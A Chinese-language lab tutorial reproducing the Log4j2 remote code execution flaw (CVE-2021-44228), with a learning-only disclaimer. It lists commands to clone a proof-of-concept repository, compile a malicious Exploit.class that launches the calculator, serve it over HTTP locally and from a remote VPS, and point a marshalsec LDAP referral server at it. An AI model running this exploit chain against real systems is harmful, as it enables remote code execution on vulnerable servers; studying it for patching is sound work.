声明:供漏洞理解学习及安全加固解决方案,请勿利用漏洞于非法途径,后果自负
复现工具:(复现工具很多,都可以测一下,个人比较喜欢集成化不太好的,方便理解)
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
下载复现工具:
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
一.本地调用计算器复现
1.本地生成Exploit.class恶意文件类,里面写入了恶意代码calc
代码语言:javascript复制X:XXXXXXXXXXXXXXXCVE-2021-44228-Apache-Log4j-Rce-mainsrcmainjavaExploit.java中写入calc命令
代码语言:javascript复制cd X:XXXXXXXXXXXXXXXCVE-2021-44228-Apache-Log4j-Rce-mainsrcmainjava
代码语言:javascript复制javac Exploit.java #编译含有恶意代码的文件Exploit.java,生成Exploit.class
(这里可以将Exploit.class放入我们的一台http服务器,挂在http服务端网页路径中)
2.搭建本地http服务
本地开启http服务(127.0.0.1:8888)
代码语言:javascript复制python -m http.server 8888 #开启http服务,python3使用http.server
3.开启LDAP监听
代码语言:javascript复制cd X:XXXXXXXXXXXXXXXCVE-2021-44228-Apache-Log4j-Rce-maintools
代码语言:javascript复制java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Exploit
4.模拟log4j2启动
运行原理:logger.error或logger.info写日志调用POC则会调用Exploit.class中的恶意代码,实现RCE。也就是说,log4j2漏洞版本只要是能写日志的,都可以触发
代码语言:javascript复制X:XXXXXXXXXXXXXXXCVE-2021-44228-Apache-Log4j-Rce-mainsrcmainjavalog4j.java
二.访问远程恶意类调用本地计算器复现
1.远程VPS环境配置
(1)VPS_OS:Ubuntu 20.04.3 LTS
(2)JDK:jdk 1.8.0_41-b04安装及部署步骤
下载地址:https://download.java.net/openjdk/jdk8u41/ri/openjdk-8u41-b04-linux-x64-14_jan_2020.tar.gz
代码语言:javascript复制mkdir /usr/local/java
cd /usr/local/java
rz # 上传下载的openjdk-8u41-b04-linux-x64-14_jan_2020.tar.gz包至远程服务器
tar -zxvf openjdk-8u41-b04-linux-x64-14_jan_2020.tar.gz
配置环境变量: vi /etc/profile,添加如下内容:
代码语言:javascript复制set java environment
JAVA_HOME=/usr/local/java/java-se-8u41-ri
JRE_HOME=/usr/local/java/java-se-8u41-ri/jre
CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin
export JAVA_HOME JRE_HOME CLASS_PATH PATH
代码语言:javascript复制source /etc/profile #让修改生效
测试以下命令生效即可
代码语言:javascript复制java –version
javac
2.恶意类Exploit.class上传VPS
代码语言:javascript复制Javac Exploit.java # 生成了含有恶意命令的Exploit.class类
放到apache2的网页目录下
代码语言:javascript复制mv Exploit.class /var/www/html
这样含有恶意命令的类Exploit.class就放好拉~
3.本地开启ldap监听
代码语言:javascript复制java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://XXX.XXX.XXX.XXX:XX/#Exploit
4.本地运行log4j2(理解为LDAP客户端)触发漏洞
(注意:当指向的远程服务器中不存在的类的话,则无法触发漏洞,可以测一下,方便理解):
代码语言:javascript复制java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://XXX.XXX.XXX.XXX:/#E # 指向一个不存在的类E.class
本地运行log4j2,LDAP收到监听,但未触发恶意命令,说明未执行恶意类Exploit.class中的calc命令,执行失败